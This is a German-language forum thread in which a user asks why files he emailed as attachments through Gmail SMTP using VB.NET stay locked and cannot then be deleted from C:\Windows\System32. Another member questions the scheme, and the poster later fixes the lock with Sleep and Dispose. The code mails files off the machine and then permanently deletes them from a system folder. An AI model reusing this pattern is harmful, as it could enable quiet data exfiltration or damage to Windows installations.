visualbasic
Goto Top

Nach send(mail) sind die gesendeten Daten nicht mehr schreibbar oder löschbar

Hallo
also ich habe hier einen Script

<code vb>Dim email As New MailMessage
email = New MailMessage
email.From = New MailAddress("*")
email.To.Add("*")
email.Subject = My.Computer.Clock.ToString
email.Body = ""

Dim di As New DirectoryInfo("*)
Dim files As FileInfo() = di.GetFiles("*", SearchOption.TopDirectoryOnly)
Dim oFile As System.IO.FileInfo

For Each oFile In files
My.Computer.FileSystem.WriteAllText("*, "*" & oFile.Name & vbCrLf, True)
email.Attachments.Add(New Attachment("*" & oFile.Name))
Next

Dim smtpSenden As New SmtpClient("Smtp.gmail.com")
smtpSenden.Port = 587
smtpSenden.EnableSsl = True
smtpSenden.Credentials = New System.Net.NetworkCredential("*", "*)
smtpSenden.Send(email)

Warum kann ich jetzt nach diesem Script den folgenden Script nicht mehr ausführen?:

<code vb>For Each oFile In files
My.Computer.FileSystem.DeleteFile("C:\Windows\System32\" & oFile.Name, FileIO.UIOption.OnlyErrorDialogs, FileIO.RecycleOption.DeletePermanently, FileIO.UICancelOption.DoNothing)
Next

Es heißt immer, der Prozess könnte nicht auf die Dateien, die gerade per Mail versendet wurden, zugreifen, da sie von einem anderen Prozess verwendet werden.

VolumenSchattenKopie vielleicht?

mfg Chris

Content-Key: 190200

Url: https://administrator.de/contentid/190200

Printed on: April 19, 2024 at 07:04 o'clock

Member: visualbasic
visualbasic Aug 26, 2012 at 05:51:20 (UTC)
Goto Top
Member: visualbasic
visualbasic Aug 26, 2012 at 06:02:13 (UTC)
Goto Top

Nein, das bringt nix
Mitglied: 60730
60730 Aug 26, 2012 at 11:30:50 (UTC)
Goto Top
moinsen,

[OT]
ich hab ja keinen Schimmer von der Materie, aber...

  • die beiden Posts sind doch ein und derselbe grmblfx?
  • du bist dir sciher, was du da machst?
  • Und das der wirklich der geeignete Weg ist?

  • dlls als anhänge per mail verschicken und die dlls danach löschen?
  • und das per vbx?
  • Du nimmst an, dass die Mails verschickt wurden, tatsächlich sind die es zu dem Zeitpunkt nicht, die sind nur auf Weg.
  • Und ohne überprüfung, ob der Empfänger, Absender und der Weg zu diesem stimmt, willst du die dlls in die Tonne treten?
  • mit nem selbstzusammengegoogelten Schnippsel?

Merkst du was?

  • ich kenne x cmdlinemailer von denen es ein paar Zeilen in die Blacklist der div. Av Lösungen geschafft haben und die daher hin und wieder mal als falsepositive gemeldet werden.
Mit so einer Lösung kannst du dir sicherer sein, dass das irgendeiner schneller bemerkt und dem AV Hersteller sagt - z.B Blat mal wieder zu den guten tun und das Ding läuft wieder. Bei deiner Nummer ist die wahrscheinklichkeit, dass sich irgendein Scriptbaby (die kiddys sind ja schlauer) da auch mal bedient und das wird dann mit dem freischalten etwas komplizierter.. (vor allem, wenn in dem Progrämmchen oder wie auch immer das dann nachher heisst auch noch ein löschbefehl drin steckt)

Wie oben angedeutet, ich hab keinen blasen Dunst von dem, was ich da geschrieben habe.
[/OT]
Überleg dir mal einen anderen Weg, der Holzweg ist an ein paar Stellen Morsch.

Gruß
Member: visualbasic
visualbasic Aug 26, 2012 at 11:45:47 (UTC)
Goto Top
Zitat von @60730:
  • die beiden Posts sind doch ein und derselbe grmblfx?
Das stimmt, allerdings habe ich auch dann noch hingeschrieben, dass es mir doch nix bringt!

* du bist dir sciher, was du da machst?
Ja, das bin ich!

* Und das der wirklich der geeignete Weg ist?
Ja


  • dlls als anhänge per mail verschicken und die dlls danach löschen?
  • und das per vbx?
Diese dlls sind eigentlich keine DLLs; das sind JPGs, die ich bloß umbenannt habe...

* Du nimmst an, dass die Mails verschickt wurden, tatsächlich sind die es zu dem Zeitpunkt nicht, die sind nur auf Weg.
Vielen Dank! Ich versuche es mal mit der Sleep()-Funktion (Private Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Integer))

* Und ohne überprüfung, ob der Empfänger, Absender und der Weg zu diesem stimmt, willst du die dlls in die Tonne
treten?
  • Wie überprüfe ich die?
  • Ja die kommt an; den Empfänger kenne ich persönlich...

* mit nem selbstzusammengegoogelten Schnippsel?
  • Es könnte auch ein "zusammengeyahooten" Schnipsel sein, oder ? -face-smile
  • Nein, den habe ich selber geschrieben

Überleg dir mal einen anderen Weg, der Holzweg ist an ein paar Stellen Morsch.
-face-smile
Member: visualbasic
visualbasic Aug 26, 2012 at 13:05:48 (UTC)
Goto Top
Habs jetzt so gemacht:

Sleep(100)
email.dispose
smtpsenden.dispose